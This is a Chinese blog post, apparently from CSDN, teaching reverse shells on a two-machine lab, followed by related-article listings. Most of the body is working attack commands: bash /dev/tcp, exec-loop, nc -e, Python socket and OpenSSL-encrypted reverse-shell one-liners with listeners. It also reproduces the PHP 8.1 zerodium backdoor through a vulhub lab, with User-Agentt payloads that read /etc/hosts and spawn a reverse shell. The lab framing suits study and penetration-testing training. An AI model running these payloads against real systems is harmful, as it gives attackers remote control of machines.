反弹shell初识

已于 2022-11-01 14:42:05 修改
阅读量4k 收藏 29
点赞数 3
分类专栏: 安全 文章标签: 反弹shell
于 2022-11-01 14:14:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiwuhen92/article/details/127632711
版权
前提:node2( 75)控制端机器,node1( 74)为要被控制端机器

一、为何需要反弹shell

当正向连接不可达时:
  • 客户机中了木马,但是在局域网内,无法正向连接。
  • 由于防火墙和局域网的限制,对方只能发送请求,不可主动接受请求

二、反弹shell原理

反弹shell是指控制端监听某个TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出传递到控制端的过程。
reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。

三、常见的反弹shell命令

3.1、bash进行反弹

1、首先控制端机器node2(75)开启监听:
nc -lvnp 4444    # 1:监听模式,v:显示指令执行过程, p:设置使用的通信端口
2、被控制端机器node1(74)允许反弹shell,执行:
bash -i >& /dev/tcp/控制端机器ip/控制端机器监听的port 0>&     
解释:
  • bash -i:打开一个交互式的bash
  • /dev/tcp/:是Linux中的一个特殊设备,打开这个文件相当于发出一个socket调用,建立一个socket连接;不存在可以手工创建
  • >&: 后面接文件时,表示将标准输出和标准错误输出重定向至文件
  • 0>&1: 代表将标准输入重定向到标准输出,这里的标准输出已经重定向到了“/dev/tcp/本机机器ip/本机机器监听的port”这个文件,也就是远程,那么标准输入也就重定向到了远程
3、步骤2执行后,此时再看控制端机器node2已经反弹到被控制端node1,可以对被控制端机器node1进行操作

3.2、使用exec执行反弹shell的方式

1、首先控制端机器node2(75)开启监听:
nc -lvnp 4444    # 1:监听模式,v:显示指令执行过程, p:设置使用的通信端口
2、被控制端机器node1(74)允执行:
root@node1:~# exec 5<> /dev/tcp/192.168.11.75/4444; cat <&5 | while read line; do $line 2>&5 >&5; done
3、步骤2执行后,此时再看控制端机器node2

3.3、使用nc进行反弹shell

1、首先控制端机器node2(75)开启监听:
nc -lvnp 4444    # 1:监听模式,v:显示指令执行过程, p:设置使用的通信端口
2、被控制端机器node1(74)允执行: 需要安装经典的netcat-traditional,不然nc -e报错 关于nc无法使用-e参数 nc:invalid option -- ‘e’_tonine9的博客-CSDN博客
nc -e /bin/bash 192.168.11.75 4444
3、步骤2执行后,此时再看控制端机器node2

3.4、基于python反弹shell

1、首先控制端机器node2(75)开启监听:
nc -lvnp 4444    # 1:监听模式,v:显示指令执行过程, p:设置使用的通信端口
2、被控制端机器node1(74)允执行: 
root@node1:~# python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);  s.connect(("192.168.11.75",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);  os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
3、步骤2执行后,此时再看控制端机器node2已经反弹到被控制端node1,可以对被控制端机器node1进行操作

3.5、加密反弹shell

1、首先控制端机器node2(75)生成证书: 
root@node2:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
会生成cert.pem、key.pem文件
然后执行: 
root@node2:/home# openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
2、被控制端机器node1(74)允执行: /tem/s要存在 
root@node1:~# mkfifo /tem/s; /bin/bash -i < /tem/s 2>&1 | openssl s_client -quiet -connect 192.168.11.75:4444 > /tem/s;rm /tem/s
3、步骤2执行后,此时再看控制端机器node2已经反弹到被控制端node1,可以对被控制端机器node1进行操作

四、靶机部署

a、环境:
    控制端机器:192.168.11.234
    被控制端机器:192.168.11.135
b、在控制端机器:192.168.11.234
执行命令:nc -lvnp 4444   
c、在被控制端机器:192.168.11.135
下载vulhub:git clone https://github.com/vulhub/vulhub.git
进入目录:cd ./vulhub-master/php/8.1-backdoor/
启动环境:docker-compose up -d
d、backdoor漏洞复现:
User-Agentt: zerodiumsystem("cat /etc/hosts");
d、shell反弹漏洞复现
User-Agentt: zerodiumsystem("bash -c ' exec bash -i >& /dev/tcp/192.168.11.234/4444 0>&1'");
控制端机器直接反弹到被控制机器上,可以操作被控制机器了:

五、参考

青霄
关注
  • 3
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹shell
ADDPPC的博客
11-26 571
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、.
反弹Shell方法论,Windows篇
大河之犬的博客
10-10 793
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
nc--反弹shell
wzhua的博客
08-04 2257
nc--反弹shell,小实验
反弹shell详细易懂讲解,看这一篇就够了
最新发布
LCW991207的博客
05-26 1408
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
NC反弹shell的几种方法
qq_59350385的博客
05-12 9666
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash
浅谈反弹shell
weixin_53284312的博客
01-12 2320
反弹shell
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell的方法和场景
weixin_45653478的博客
04-01 1235
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
对网络安全中反弹shell对详细描述的文章
05-18
反弹shell
反弹shell汇总(超详细)
qq_52173020的博客
05-27 7306
反弹shell姿势大全
nc的使用+反弹shell
2301_80366980的博客
02-18 836
记录学习linux中nc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
【安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6065
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
各种反弹shell原理
haoge1998的博客
04-18 1万+
各种反弹shell原理 一、理解反弹shell 1、为什么需要反弹shell 当正向连接不可达时候 客户机中了木马,但是在局域网内,无法正向连接。 由于防火墙和局域网的限制,对方只能发送请求,不可主动接受请求 2、原理 反弹shell:控制端监听某个端口,被控制端发起请求到该端口,并将命令行的输入输出传到控制端 二、常用的反弹shell命令 1、bash进行反弹 (1)在windows上启动监听端口 nc -lvp 4444 l:代表入站监听 v:代表输出信息级别 p:代表监听的端口 (2)在Lin
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 1378
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
反弹shell无法反弹
08-13
您好!关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或使用其他技术来绕过防火墙。 2. 端口未开放:如果目标主机的特定端口没有开放,那么反弹shell连接将无法建立。您可以通过扫描目标主机的端口来确定哪些端口是开放的,并调整反弹shell的配置以使用其中一个开放的端口。 3. 网络连接问题:有时候网络连接不稳定或存在其他问题,可能导致反弹shell无法成功。您可以尝试使用其他网络或通过网络工具进行连通性测试,以确保网络连接正常。 4. 权限问题:如果您没有足够的权限来执行反弹shell操作,那么它也可能失败。请确保您具有足够的权限,并尝试以管理员身份运行反弹shell。 请注意,反弹shell是一项潜在的非法活动,我们不鼓励或支持任何非法的行为。以上回答仅供技术讨论和参考,请在合法和合适的环境中使用这些知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值